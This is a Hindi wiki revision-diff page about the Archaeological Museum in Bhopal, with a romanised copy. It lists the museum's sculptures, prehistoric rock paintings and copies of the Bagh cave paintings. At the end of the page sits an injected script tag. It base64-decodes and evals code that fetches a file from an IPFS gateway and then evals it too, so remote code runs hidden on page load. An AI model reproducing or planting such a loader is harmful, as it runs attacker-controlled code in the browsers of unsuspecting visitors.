Difference between revisions of "पुरातात्विक संग्रहालय भोपाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खूबसूरत" to "ख़ूबसूरत")
m (Text replace - " मे " to " में ")
Line 5: Line 5:
 
*पुरातात्विक संग्रहालय में विभिन्‍न स्‍कूलों से एकत्रित की गई पेंटिग्‍स, बाघ गुफाओं की चित्रकारियों की प्रतिलिपियाँ, अलक्ष्‍मी और [[बुद्ध]] की प्रतिमाएँ इस संग्रहालय में सहेजकर रखी गई हैं।  
 
*पुरातात्विक संग्रहालय में विभिन्‍न स्‍कूलों से एकत्रित की गई पेंटिग्‍स, बाघ गुफाओं की चित्रकारियों की प्रतिलिपियाँ, अलक्ष्‍मी और [[बुद्ध]] की प्रतिमाएँ इस संग्रहालय में सहेजकर रखी गई हैं।  
 
*पुरातात्विक संग्रहालय की दुकानों से पत्‍थरों की मूर्तियों ख़रीदी जा सकती हैं।  
 
*पुरातात्विक संग्रहालय की दुकानों से पत्‍थरों की मूर्तियों ख़रीदी जा सकती हैं।  
*प्राचीन संस्कृति से अवगत होने मे पुरातात्विक संग्रहालय मददगार साबित है क्योंकि इस संग्रहालय में शोधार्थियों और इतिहासकारों को जानकारी प्रदान करने के लिए काफि वस्तुएँ मोजुद है।
+
*प्राचीन संस्कृति से अवगत होने में पुरातात्विक संग्रहालय मददगार साबित है क्योंकि इस संग्रहालय में शोधार्थियों और इतिहासकारों को जानकारी प्रदान करने के लिए काफि वस्तुएँ मोजुद है।
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मध्य प्रदेश के पर्यटन स्थल}}
 
{{मध्य प्रदेश के पर्यटन स्थल}}

Revision as of 07:43, 20 February 2011

  • madhy pradesh ke vidisha zile ke siroanj mean puratatvik dharohar ko sanrakshit karane ke lie sthaniy sangrahalay sthapit kiya gaya hai.
  • banaganga rod par sthit puratatvik sangrahalay mean madhh‍y pradesh ke vibhinh‍n hish‍soan se kala ke khoobasoorat namoone aur moortiyoan ko ekatrit karake rakha gaya hai.
  • puratatvik sangrahalay ek aisa sangrahalay hai jisaki simaean kisi ek bhavan ke dayare mean simit nahian haian.
  • puratatvik sangrahalay ke parisar mean vishv dharohar bhimabetaka ke saman pragaitihasik kal ke shail chitr apane mool roop mean vidyaman haian.
  • puratatvik sangrahalay mean vibhinh‍n sh‍kooloan se ekatrit ki gee peantigh‍s, bagh guphaoan ki chitrakariyoan ki pratilipiyaan, alakshh‍mi aur buddh ki pratimaean is sangrahalay mean sahejakar rakhi gee haian.
  • puratatvik sangrahalay ki dukanoan se path‍tharoan ki moortiyoan kharidi ja sakati haian.
  • prachin sanskriti se avagat hone mean puratatvik sangrahalay madadagar sabit hai kyoanki is sangrahalay mean shodharthiyoan aur itihasakaroan ko janakari pradan karane ke lie kaphi vastuean mojud hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>